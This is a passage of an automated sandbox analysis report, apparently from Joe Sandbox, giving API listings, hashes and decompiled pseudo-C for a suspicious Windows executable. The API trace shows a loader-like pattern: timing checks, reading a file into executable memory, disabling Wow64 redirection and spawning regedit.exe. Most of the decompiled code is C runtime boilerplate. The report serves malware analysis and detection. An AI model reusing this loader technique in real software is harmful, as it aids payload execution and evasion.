                                      0x004011f7
                                      0x004010c5
                                      0x004010c8
                                      0x00000000
                                      0x00000000
                                      0x004010cc
                                      0x004010d3
                                      0x004010df
                                      0x004010e2
                                      0x004010fe
                                      0x00401104
                                      0x00401106
                                      0x0040112c
                                      0x00000000
                                      0x0040112c
                                      0x0040110d
                                      0x0040111a
                                      0x00401123
                                      0x00401123
                                      0x004010a9
                                      0x00000000
                                      0x004010a9
                                      0x00401033
                                      0x00401038
                                      0x0040103a
                                      0x0040103c
                                      0x0040103d
                                      0x0040103e
                                      0x00401043
                                      0x00401044
                                      0x00401049
                                      0x0040104a
                                      0x0040104b
                                      0x0040104c
                                      0x0040104e
                                      0x0040106a
                                      0x0040106d
                                      0x00401072
                                      0x00401075
                                      0x00401079
                                      0x00401094
                                      0x00401094
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040107b
                                      0x0040107b
                                      0x0040107d
                                      0x00401080
                                      0x0040108c
                                      0x0040108f
                                      0x00401090
                                      0x00000000

                                      APIs
                                      • GetTickCount.KERNEL32 ref: 0040100F
                                      • Sleep.KERNELBASE(000002BE), ref: 00401018
                                      • GetTickCount.KERNEL32 ref: 0040101E
                                      • GetCommandLineW.KERNEL32 ref: 0040109D
                                        • Part of subcall function 00401A4F: __wfsopen.LIBCMT ref: 00401A5C
                                      • _fseek.LIBCMT ref: 0040103E
                                      • _fseek.LIBCMT ref: 0040104E
                                        • Part of subcall function 00401915: __lock_file.LIBCMT ref: 00401956
                                        • Part of subcall function 00401915: __fseek_nolock.LIBCMT ref: 00401967
                                      • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 0040105F
                                      • __fread_nolock.LIBCMT ref: 0040106D
                                      • GetCurrentProcess.KERNEL32(?), ref: 004010B4
                                      • IsWow64Process.KERNEL32(00000000), ref: 004010BB
                                      • _memset.LIBCMT ref: 004010D3
                                      • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 004010E2
                                      • GetCommandLineW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004010F6
                                      • CreateProcessW.KERNEL32(C:\windows\regedit.exe,00000000), ref: 004010FE
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040110D
                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 0040111A
                                      • ExitProcess.KERNEL32 ref: 00401123
                                      • Wow64RevertWow64FsRedirection.KERNEL32(?), ref: 0040112C
                                      • #17.COMCTL32 ref: 00401132
                                      • LoadStringW.USER32(?,00000067,0040CEE0,00000006), ref: 0040114B
                                      • LoadStringW.USER32(?,000000A1,0040DD40,00000009), ref: 0040115A
                                      • LoadAcceleratorsW.USER32 ref: 0040116E
                                      • TranslateAcceleratorW.USER32(00000000,?), ref: 00401189
                                      • GetParent.USER32(?), ref: 004011A5
                                      • PostMessageW.USER32 ref: 004011C2
                                      • TranslateMessage.USER32(?), ref: 004011CE
                                      • DispatchMessageW.USER32(?), ref: 004011D8
                                      • GetMessageW.USER32 ref: 004011E5
                                      • DestroyMenu.USER32 ref: 004011F1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.957134407.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000008.00000002.957101736.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000008.00000002.957143775.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000008.00000002.957150990.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_dpgglstunxhpw.jbxd
                                      Similarity
                                      • API ID: ProcessWow64$Message$Load$CommandCountExitLineRedirectionStringTickTranslate_fseek$AcceleratorAcceleratorsAllocCodeCreateCurrentDestroyDisableDispatchMenuObjectParentPostRevertSingleSleepVirtualWait__fread_nolock__fseek_nolock__lock_file__wfsopen_memset
                                      • String ID: C:\windows\regedit.exe
                                      • API String ID: 735618220-2898893780
                                      • Opcode ID: 13f8cff66a533022ee180b1c7ee89b48ba83d43a267836f3488401742cd5cd2c
                                      • Instruction ID: b5c5d907f046bb421fc019989e3b7981bd47ba42383611c00ead7985f5c1367a
                                      • Opcode Fuzzy Hash: 13f8cff66a533022ee180b1c7ee89b48ba83d43a267836f3488401742cd5cd2c
                                      • Instruction Fuzzy Hash: EE516C71A00209ABEB10AFB1DD49EAF7B7DAF49754F100036F601B61E2D7788D41CB68
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 35 401de7-401dfa DecodePointer 36 401dfc 35->36 37 401dff-401e1b call 401dc2 call 401de7 35->37 36->37 42 401e20-401e23 37->42
                                      APIs
                                      • DecodePointer.KERNEL32(?,00401E20,00000000,00000000,00000000,00000000,00000000,00406B17,?,00402436,00000003,00401308,00000001,00000000,00000000), ref: 00401DF2
                                      • __invoke_watson.LIBCMT ref: 00401E0E
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.957134407.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000008.00000002.957101736.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000008.00000002.957143775.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000008.00000002.957150990.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_dpgglstunxhpw.jbxd
                                      Similarity
                                      • API ID: DecodePointer__invoke_watson
                                      • String ID:
                                      • API String ID: 4034010525-0
                                      • Opcode ID: b0500e1ec9f77219aeb5e17d6dfa6b312d4f4269004dd2458cfd01cf64ae9f47
                                      • Instruction ID: 082bb326a77743ce014774677ee0fbcbc0c9760a31ecf5b101ea5fa056083c42
                                      • Opcode Fuzzy Hash: b0500e1ec9f77219aeb5e17d6dfa6b312d4f4269004dd2458cfd01cf64ae9f47
                                      • Instruction Fuzzy Hash: 6CE0EC3211010ABBDF022FA5DD099AA3FA7FF44350B444435FD1495071DA36D931EB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 43 40854c-408556 44 408573-40857c 43->44 45 408558-408562 43->45 47 40857e 44->47 48 40857f-408584 44->48 45->44 46 408564-408572 call 401e66 45->46 47->48 50 408586-408597 RtlAllocateHeap 48->50 51 408599-4085a0 48->51 50->51 53 4085cb-4085cd 50->53 54 4085a2-4085ab call 402477 51->54 55 4085be-4085c3 51->55 54->48 59 4085ad-4085b2 54->59 55->53 56 4085c5 55->56 56->53 60 4085b4 59->60 61 4085ba-4085bc 59->61 60->61 61->53
                                      C-Code - Quality: 86%
                                      			E0040854C(signed int _a4, signed int _a8, long _a12) {
                                      				void* _t10;
                                      				long _t11;
                                      				long _t12;
                                      				signed int _t13;
                                      				signed int _t17;
                                      				long _t19;
                                      				long _t24;
                                      
                                      				_t17 = _a4;
                                      				if(_t17 == 0) {
                                      					L3:
                                      					_t24 = _t17 * _a8;
                                      					__eflags = _t24;
                                      					if(_t24 == 0) {
                                      						_t24 = _t24 + 1;
                                      						__eflags = _t24;
                                      					}
                                      					goto L5;
                                      					L6:
                                      					_t10 = RtlAllocateHeap( *0x40cfc4, 8, _t24); // executed
                                      					__eflags = 0;
                                      					if(0 == 0) {
                                      						goto L7;
                                      					}
                                      					L14:
                                      					return _t10;
                                      					goto L15;
                                      					L7:
                                      					__eflags =  *0x40d62c;
                                      					if( *0x40d62c == 0) {
                                      						_t19 = _a12;
                                      						__eflags = _t19;
                                      						if(_t19 != 0) {
                                      							 *_t19 = 0xc;
                                      						}
                                      					} else {
                                      						_t11 = E00402477(_t10, _t24);
                                      						__eflags = _t11;
                                      						if(_t11 != 0) {
                                      							L5:
                                      							_t10 = 0;
                                      							__eflags = _t24 - 0xffffffe0;
                                      							if(_t24 > 0xffffffe0) {
                                      								goto L7;
                                      							} else {
                                      								goto L6;
                                      							}
                                      						} else {
                                      							_t12 = _a12;
                                      							__eflags = _t12;
                                      							if(_t12 != 0) {
                                      								 *_t12 = 0xc;
                                      							}
                                      							_t10 = 0;
                                      						}
                                      					}
                                      					goto L14;
                                      				} else {
                                      					_t13 = 0xffffffe0;
                                      					_t27 = _t13 / _t17 - _a8;
                                      					if(_t13 / _t17 >= _a8) {
                                      						goto L3;
                                      					} else {
                                      						 *((intOrPtr*)(E00401E66(_t27))) = 0xc;
                                      						return 0;
                                      					}
                                      				}
                                      				L15:
                                      			}










                                      0x00408551
                                      0x00408556
                                      0x00408573
                                      0x00408578
                                      0x0040857a
                                      0x0040857c
                                      0x0040857e
                                      0x0040857e
                                      0x0040857e
                                      0x00000000
                                      0x00408586
                                      0x0040858f
                                      0x00408595
                                      0x00408597
                                      0x00000000
                                      0x00000000
                                      0x004085cb
                                      0x004085cd
                                      0x00000000
                                      0x00408599
                                      0x00408599
                                      0x004085a0
                                      0x004085be
                                      0x004085c1
                                      0x004085c3
                                      0x004085c5
                                      0x004085c5
                                      0x004085a2
                                      0x004085a3
                                      0x004085a9
                                      0x004085ab
                                      0x0040857f
                                      0x0040857f
                                      0x00408581
                                      0x00408584
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004085ad
                                      0x004085ad
                                      0x004085b0
                                      0x004085b2
                                      0x004085b4
                                      0x004085b4
                                      0x004085ba
                                      0x004085ba
                                      0x004085ab
                                      0x00000000
                                      0x00408558
                                      0x0040855c
                                      0x0040855f
                                      0x00408562
                                      0x00000000
                                      0x00408564
                                      0x00408569
                                      0x00408572
                                      0x00408572
                                      0x00408562
                                      0x00000000

                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004059F6,?,?,00000000,00000000,00000000,?,004042A2,00000001,00000214,?,00401038), ref: 0040858F
                                        • Part of subcall function 00401E66: __getptd_noexit.LIBCMT ref: 00401E66
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.957134407.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000008.00000002.957101736.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000008.00000002.957143775.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000008.00000002.957150990.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_dpgglstunxhpw.jbxd
                                      Similarity
                                      • API ID: AllocateHeap__getptd_noexit
                                      • String ID:
                                      • API String ID: 328603210-0
                                      • Opcode ID: 78cb4feb16e057d0e2cb3cebff3c2ab0fabc03ed057622e3e76df3dd97b03fd8
                                      • Instruction ID: 13c43ce280eb49603ccc5c5fb654576f0c81eb5202d9f2d83ad5a1bfaa1574fb
                                      • Opcode Fuzzy Hash: 78cb4feb16e057d0e2cb3cebff3c2ab0fabc03ed057622e3e76df3dd97b03fd8
                                      • Instruction Fuzzy Hash: F501F531600211ABEB249F31DE45F6B3784ABA0370F00853FE895AB2D0CF38CC008A4C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 62 401a4f-401a65 call 401991
                                      C-Code - Quality: 25%
                                      			E00401A4F(intOrPtr _a4, intOrPtr _a8) {
                                      				void* __ebp;
                                      				void* _t3;
                                      				void* _t4;
                                      				void* _t5;
                                      				void* _t6;
                                      				void* _t9;
                                      
                                      				_push(0x40);
                                      				_push(_a8);
                                      				_push(_a4);
                                      				_t3 = E00401991(_t4, _t5, _t6, _t9); // executed
                                      				return _t3;
                                      			}









                                      0x00401a54
                                      0x00401a56
                                      0x00401a59
                                      0x00401a5c
                                      0x00401a65

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.957134407.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000008.00000002.957101736.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000008.00000002.957143775.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000008.00000002.957150990.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_dpgglstunxhpw.jbxd
                                      Similarity
                                      • API ID: __wfsopen
                                      • String ID:
                                      • API String ID: 197181222-0
                                      • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                      • Instruction ID: 73ab95eaebed31112dedeb384939a99c41ea5e8962cc08f2dd2c4e48d81c1728
                                      • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                      • Instruction Fuzzy Hash: 39C09B7244410C77CF111947DC02E553F1997C0774F444031FB1C1D171B577D561D589
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 65 404140-404148 RtlEncodePointer
                                      APIs
                                      • RtlEncodePointer.NTDLL(00000000,004067F2,0040D000,00000314,00000000,?,?,?,?,?,004023BD,0040D000,Microsoft Visual C++ Runtime Library,00012010), ref: 00404142
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.957134407.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000008.00000002.957101736.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000008.00000002.957143775.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000008.00000002.957150990.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_dpgglstunxhpw.jbxd
                                      Similarity
                                      • API ID: EncodePointer
                                      • String ID:
                                      • API String ID: 2118026453-0
                                      • Opcode ID: 07cf166470ea6c05c1575d7841d168e8ca1cf770de9049bf1a34cfa88c9a7e15
                                      • Instruction ID: 320fb652cea0c6775c1c8cbb56ecac6aa1c380c61b5076c787df298dad675eb3
                                      • Opcode Fuzzy Hash: 07cf166470ea6c05c1575d7841d168e8ca1cf770de9049bf1a34cfa88c9a7e15
                                      • Instruction Fuzzy Hash:
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 85%
                                      			E00404F4C(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                      				intOrPtr _v0;
                                      				void* _v804;
                                      				intOrPtr _v808;
                                      				intOrPtr _v812;
                                      				intOrPtr _t6;
                                      				intOrPtr _t11;
                                      				intOrPtr _t12;
                                      				intOrPtr _t13;
                                      				long _t17;
                                      				intOrPtr _t21;
                                      				intOrPtr _t22;
                                      				intOrPtr _t25;
                                      				intOrPtr _t26;
                                      				intOrPtr _t27;
                                      				intOrPtr* _t31;
                                      				void* _t34;
                                      
                                      				_t27 = __esi;
                                      				_t26 = __edi;
                                      				_t25 = __edx;
                                      				_t22 = __ecx;
                                      				_t21 = __ebx;
                                      				_t6 = __eax;
                                      				_t34 = _t22 -  *0x40c560; // 0xd7c92957
                                      				if(_t34 == 0) {
                                      					asm("repe ret");
                                      				}
                                      				 *0x40db08 = _t6;
                                      				 *0x40db04 = _t22;
                                      				 *0x40db00 = _t25;
                                      				 *0x40dafc = _t21;
                                      				 *0x40daf8 = _t27;
                                      				 *0x40daf4 = _t26;
                                      				 *0x40db20 = ss;
                                      				 *0x40db14 = cs;
                                      				 *0x40daf0 = ds;
                                      				 *0x40daec = es;
                                      				 *0x40dae8 = fs;
                                      				 *0x40dae4 = gs;
                                      				asm("pushfd");
                                      				_pop( *0x40db18);
                                      				 *0x40db0c =  *_t31;
                                      				 *0x40db10 = _v0;
                                      				 *0x40db1c =  &_a4;
                                      				 *0x40da58 = 0x10001;
                                      				_t11 =  *0x40db10; // 0x0
                                      				 *0x40da0c = _t11;
                                      				 *0x40da00 = 0xc0000409;
                                      				 *0x40da04 = 1;
                                      				_t12 =  *0x40c560; // 0xd7c92957
                                      				_v812 = _t12;
                                      				_t13 =  *0x40c564; // 0x2836d6a8
                                      				_v808 = _t13;
                                      				 *0x40da50 = IsDebuggerPresent();
                                      				_push(1);
                                      				E00404F44(_t14);
                                      				SetUnhandledExceptionFilter(0);
                                      				_t17 = UnhandledExceptionFilter(0x40a360);
                                      				if( *0x40da50 == 0) {
                                      					_push(1);
                                      					E00404F44(_t17);
                                      				}
                                      				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                      			}



















                                      0x00404f4c
                                      0x00404f4c
                                      0x00404f4c
                                      0x00404f4c
                                      0x00404f4c
                                      0x00404f4c
                                      0x00404f4c
                                      0x00404f52
                                      0x00404f54
                                      0x00404f54
                                      0x00407bf6
                                      0x00407bfb
                                      0x00407c01
                                      0x00407c07
                                      0x00407c0d
                                      0x00407c13
                                      0x00407c19
                                      0x00407c20
                                      0x00407c27
                                      0x00407c2e
                                      0x00407c35
                                      0x00407c3c
                                      0x00407c43
                                      0x00407c44
                                      0x00407c4d
                                      0x00407c55
                                      0x00407c5d
                                      0x00407c68
                                      0x00407c72
                                      0x00407c77
                                      0x00407c7c
                                      0x00407c86
                                      0x00407c90
                                      0x00407c95
                                      0x00407c9b
                                      0x00407ca0
                                      0x00407cac
                                      0x00407cb1
                                      0x00407cb3
                                      0x00407cbb
                                      0x00407cc6
                                      0x00407cd3
                                      0x00407cd5
                                      0x00407cd7
                                      0x00407cdc
                                      0x00407cf0

                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 00407CA6
                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 00407CBB
                                      • UnhandledExceptionFilter.KERNEL32(0040A360), ref: 00407CC6
                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 00407CE2
                                      • TerminateProcess.KERNEL32(00000000), ref: 00407CE9
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.957134407.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000008.00000002.957101736.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000008.00000002.957143775.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000008.00000002.957150990.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_dpgglstunxhpw.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                      • String ID:
                                      • API String ID: 2579439406-0
                                      • Opcode ID: 5a4a30d4b183a6f5689afef321dfb0e74dc2e1b2a13235df191463a946331b0a
                                      • Instruction ID: dbcf6b17a614ed6de0b1c9335e572033b93b759128c27e0357c0478f51a6bb28
                                      • Opcode Fuzzy Hash: 5a4a30d4b183a6f5689afef321dfb0e74dc2e1b2a13235df191463a946331b0a
                                      • Instruction Fuzzy Hash: 2221C0B9E08205DFD704EFA5EB48A443BB4BB48310F41817AE509B76A1E7B46989CF4D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 62%
                                      			E00404439(void* __ebx) {
                                      				void* __edi;
                                      				void* __esi;
                                      				_Unknown_base(*)()* _t7;
                                      				long _t10;
                                      				void* _t11;
                                      				int _t12;
                                      				void* _t14;
                                      				void* _t15;
                                      				void* _t16;
                                      				void* _t18;
                                      				intOrPtr _t21;
                                      				long _t26;
                                      				void* _t30;
                                      				struct HINSTANCE__* _t35;
                                      				intOrPtr* _t36;
                                      				void* _t39;
                                      				intOrPtr* _t41;
                                      				void* _t42;
                                      
                                      				_t30 = __ebx;
                                      				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
                                      				if(_t35 != 0) {
                                      					 *0x40d844 = GetProcAddress(_t35, "FlsAlloc");
                                      					 *0x40d848 = GetProcAddress(_t35, "FlsGetValue");
                                      					 *0x40d84c = GetProcAddress(_t35, "FlsSetValue");
                                      					_t7 = GetProcAddress(_t35, "FlsFree");
                                      					__eflags =  *0x40d844;
                                      					_t39 = TlsSetValue;
                                      					 *0x40d850 = _t7;
                                      					if( *0x40d844 == 0) {
                                      						L6:
                                      						 *0x40d848 = TlsGetValue;
                                      						 *0x40d844 = E00404149;
                                      						 *0x40d84c = _t39;
                                      						 *0x40d850 = TlsFree;
                                      					} else {
                                      						__eflags =  *0x40d848;
                                      						if( *0x40d848 == 0) {
                                      							goto L6;
                                      						} else {
                                      							__eflags =  *0x40d84c;
                                      							if( *0x40d84c == 0) {
                                      								goto L6;
                                      							} else {
                                      								__eflags = _t7;
                                      								if(_t7 == 0) {
                                      									goto L6;
                                      								}
                                      							}
                                      						}
                                      					}
                                      					_t10 = TlsAlloc();
                                      					 *0x40c574 = _t10;
                                      					__eflags = _t10 - 0xffffffff;
                                      					if(_t10 == 0xffffffff) {
                                      						L15:
                                      						_t11 = 0;
                                      						__eflags = 0;
                                      					} else {
                                      						_t12 = TlsSetValue(_t10,  *0x40d848);
                                      						__eflags = _t12;
                                      						if(_t12 == 0) {
                                      							goto L15;
                                      						} else {
                                      							E00401FC4();
                                      							_t41 = __imp__EncodePointer;
                                      							_t14 =  *_t41( *0x40d844);
                                      							 *0x40d844 = _t14;
                                      							_t15 =  *_t41( *0x40d848);
                                      							 *0x40d848 = _t15;
                                      							_t16 =  *_t41( *0x40d84c);
                                      							 *0x40d84c = _t16;
                                      							 *0x40d850 =  *_t41( *0x40d850);
                                      							_t18 = E00406124();
                                      							__eflags = _t18;
                                      							if(_t18 == 0) {
                                      								L14:
                                      								E00404186();
                                      								goto L15;
                                      							} else {
                                      								_t36 = __imp__DecodePointer;
                                      								_t21 =  *((intOrPtr*)( *_t36()))( *0x40d844, E0040430A);
                                      								 *0x40c570 = _t21;
                                      								__eflags = _t21 - 0xffffffff;
                                      								if(_t21 == 0xffffffff) {
                                      									goto L14;
                                      								} else {
                                      									_t42 = E004059E0(1, 0x214);
                                      									__eflags = _t42;
                                      									if(_t42 == 0) {
                                      										goto L14;
                                      									} else {
                                      										__eflags =  *((intOrPtr*)( *_t36()))( *0x40d84c,  *0x40c570, _t42);
                                      										if(__eflags == 0) {
                                      											goto L14;
                                      										} else {
                                      											_push(0);
                                      											_push(_t42);
                                      											E004041C3(_t30, _t36, _t42, __eflags);
                                      											_t26 = GetCurrentThreadId();
                                      											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
                                      											 *_t42 = _t26;
                                      											_t11 = 1;
                                      										}
                                      									}
                                      								}
                                      							}
                                      						}
                                      					}
                                      					return _t11;
                                      				} else {
                                      					E00404186();
                                      					return 0;
                                      				}
                                      			}





















                                      0x00404439
                                      0x00404447
                                      0x0040444b
                                      0x0040446b
                                      0x00404478
                                      0x00404485
                                      0x0040448a
                                      0x0040448c
                                      0x00404493
                                      0x00404499
                                      0x0040449e
                                      0x004044b6
                                      0x004044bb
                                      0x004044c5
                                      0x004044cf
                                      0x004044d5
                                      0x004044a0
                                      0x004044a0
                                      0x004044a7
                                      0x00000000
                                      0x004044a9
                                      0x004044a9
                                      0x004044b0
                                      0x00000000
                                      0x004044b2
                                      0x004044b2
                                      0x004044b4
                                      0x00000000
                                      0x00000000
                                      0x004044b4
                                      0x004044b0
                                      0x004044a7
                                      0x004044da
                                      0x004044e0
                                      0x004044e5
                                      0x004044e8
                                      0x004045af
                                      0x004045af
                                      0x004045af
                                      0x004044ee
                                      0x004044f5
                                      0x004044f7
                                      0x004044f9
                                      0x00000000
                                      0x004044ff
                                      0x004044ff
                                      0x0040450a
                                      0x00404510
                                      0x00404518
                                      0x0040451d
                                      0x00404525
                                      0x0040452a
                                      0x00404532
                                      0x00404539
                                      0x0040453e
                                      0x00404543
                                      0x00404545
                                      0x004045aa
                                      0x004045aa
                                      0x00000000
                                      0x00404547
                                      0x00404547
                                      0x0040455a
                                      0x0040455c
                                      0x00404561
                                      0x00404564
                                      0x00000000
                                      0x00404566
                                      0x00404572
                                      0x00404576
                                      0x00404578
                                      0x00000000
                                      0x0040457a
                                      0x0040458b
                                      0x0040458d
                                      0x00000000
                                      0x0040458f
                                      0x0040458f
                                      0x00404591
                                      0x00404592
                                      0x00404599
                                      0x0040459f
                                      0x004045a3
                                      0x004045a7
                                      0x004045a7
                                      0x0040458d
                                      0x00404578
                                      0x00404564
                                      0x00404545
                                      0x004044f9
                                      0x004045b3
                                      0x0040444d
                                      0x0040444d
                                      0x00404455
                                      0x00404455

                                      APIs
                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00401B9D), ref: 00404441
                                      • __mtterm.LIBCMT ref: 0040444D
                                        • Part of subcall function 00404186: DecodePointer.KERNEL32(00000004,004045AF,?,00401B9D), ref: 00404197
                                        • Part of subcall function 00404186: TlsFree.KERNEL32(00000019,004045AF,?,00401B9D), ref: 004041B1
                                        • Part of subcall function 00404186: DeleteCriticalSection.KERNEL32(00000000,00000000,77A5B15F,?,004045AF,?,00401B9D), ref: 0040618B
                                        • Part of subcall function 00404186: _free.LIBCMT ref: 0040618E
                                        • Part of subcall function 00404186: DeleteCriticalSection.KERNEL32(00000019,77A5B15F,?,004045AF,?,00401B9D), ref: 004061B5
                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,00401B9D), ref: 00404463
                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,00401B9D), ref: 00404470
                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,00401B9D), ref: 0040447D
                                      • GetProcAddress.KERNEL32(00000000,FlsFree,?,00401B9D), ref: 0040448A
                                      • TlsAlloc.KERNEL32(?,00401B9D), ref: 004044DA
                                      • TlsSetValue.KERNEL32(00000000,?,00401B9D), ref: 004044F5
                                      • __init_pointers.LIBCMT ref: 004044FF
                                      • EncodePointer.KERNEL32(?,00401B9D), ref: 00404510
                                      • EncodePointer.KERNEL32(?,00401B9D), ref: 0040451D
                                      • EncodePointer.KERNEL32(?,00401B9D), ref: 0040452A
                                      • EncodePointer.KERNEL32(?,00401B9D), ref: 00404537
                                      • DecodePointer.KERNEL32(0040430A,?,00401B9D), ref: 00404558
                                      • __calloc_crt.LIBCMT ref: 0040456D
                                      • DecodePointer.KERNEL32(00000000,?,00401B9D), ref: 00404587
                                      • GetCurrentThreadId.KERNEL32(?,00401B9D), ref: 00404599
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.957134407.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000008.00000002.957101736.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000008.00000002.957143775.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000008.00000002.957150990.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_dpgglstunxhpw.jbxd
                                      Similarity
                                      • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                      • API String ID: 3698121176-3819984048
                                      • Opcode ID: fcb6ee4b144fc0039d8e472aa05ea99e8894d2fc9dd1030c82cdb18b4f8161c3
                                      • Instruction ID: c3e9338d85a01cfe0ed26c54675152b6764567e349a99c4c3ac65f6cdb1ce54c
                                      • Opcode Fuzzy Hash: fcb6ee4b144fc0039d8e472aa05ea99e8894d2fc9dd1030c82cdb18b4f8161c3
                                      • Instruction Fuzzy Hash: F2313FB2D01211AAC720BFB5EE096163BE5EBC4360B14863BE524B22F1D7789845CF9D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 91%
                                      			E004041C3(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                      				intOrPtr _t26;
                                      				intOrPtr _t30;
                                      				intOrPtr _t39;
                                      				void* _t40;
                                      
                                      				_t31 = __ebx;
                                      				_push(8);
                                      				_push(0x40adc0);
                                      				E00402EC0(__ebx, __edi, __esi);
                                      				GetModuleHandleW(L"KERNEL32.DLL");
                                      				_t39 =  *((intOrPtr*)(_t40 + 8));
                                      				 *((intOrPtr*)(_t39 + 0x5c)) = 0x409dd0;
                                      				 *(_t39 + 8) =  *(_t39 + 8) & 0x00000000;
                                      				 *((intOrPtr*)(_t39 + 0x14)) = 1;
                                      				 *((intOrPtr*)(_t39 + 0x70)) = 1;
                                      				 *((char*)(_t39 + 0xc8)) = 0x43;
                                      				 *((char*)(_t39 + 0x14b)) = 0x43;
                                      				 *(_t39 + 0x68) = 0x40c578;
                                      				E0040629E(__ebx, 1, 0xd);
                                      				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
                                      				InterlockedIncrement( *(_t39 + 0x68));
                                      				 *(_t40 - 4) = 0xfffffffe;
                                      				E00404265();
                                      				E0040629E(_t31, 1, 0xc);
                                      				 *(_t40 - 4) = 1;
                                      				_t26 =  *((intOrPtr*)(_t40 + 0xc));
                                      				 *((intOrPtr*)(_t39 + 0x6c)) = _t26;
                                      				if(_t26 == 0) {
                                      					_t30 =  *0x40cce0; // 0x40cc08
                                      					 *((intOrPtr*)(_t39 + 0x6c)) = _t30;
                                      				}
